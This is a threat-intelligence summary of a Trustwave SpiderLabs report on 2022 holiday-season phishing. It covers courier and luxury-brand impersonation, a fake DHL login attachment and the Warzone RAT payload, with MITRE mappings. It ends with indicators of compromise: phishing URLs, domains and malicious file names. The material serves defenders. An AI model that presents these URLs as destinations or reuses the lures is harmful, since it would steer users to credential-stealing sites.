During the 2022 holiday shopping season, cybercriminals have intensified seasonal phishing and fraud campaigns that blend with legitimate shopping activity. Trustwave SpiderLabs outlines package-delivery, fake-order, and promotional scams impersonating brands like DHL, USPS, FedEx, Ray-Ban, Louis Vuitton, and Geek Squad, often delivering credential-stealing pages or malware. #DHL #USPS #UPS #FedEx #RayBan #LouisVuitton #GeekSquad #WarzoneRAT
Keypoints
- Holiday shopping season correlates with an uptick in fraud schemes designed to blend with normal shopping activity.
- Package delivery scams impersonate couriers (DHL, USPS, UPS, FedEx) and use fake tracking links or attachments to steal data or deliver malware.
- DHL Express address-confirmation phishing uses an HTML attachment that hosts a fake login page to harvest credentials.
- The Warzone Remote Access Trojan (RAT) can be dropped as a payload via phishing and is capable of credential theft and UAC bypass.
- Fake promotions and order scams impersonate brands (Ray-Ban, Louis Vuitton, 7-Eleven, Geek Squad) to lure victims into providing personal or payment details.
- Practical protections include MFA, up-to-date software, cautious shopping practices, and tracking/shopping-safety habits.
MITRE Techniques
- [T1566.001] Phishing – Spearphishing Link – “These messages threat actors craft as package delivery notifications … contain a fake tracking link or an attachment that directs to a fake website asking users to input their password or other sensitive information.”
- [T1566.002] Phishing – Spearphishing Attachment – “The attachment is an HTML file named “AWB_87990589.html.” When clicked, it does not show any shipping information … Instead, it shows a fake DHL Express login page that asks for the user’s account password.”
- [T1548.001] Bypass User Account Control – “Once executed, the Warzone Remote Access Trojan (RAT) as its payload, which is capable of credential theft and User Access Control (UAC) bypass.”
- [T1003] Credential Access – “the Warzone RAT … capable of credential theft.”
Indicators of Compromise
- [URL/Domain] – Examples of phishing domains/URLs used in campaigns: barbacoasevilla.com/mail/DHL.php, gai-building.azurewebsites.net/bolderi.php?i=chanted&e=minimum, security-subscriber-center.grau-r.com/SubscribeClick?ox=rbm&[email protected], www.rbmhouse.com/m
- [Domain] – Additional phishing domains referenced: rbmhouse.com, grau-r.com, barbacoasevilla.com
- [File] – Attachments and payloads used in campaigns: Delivery Report.exe, Delivery Report.img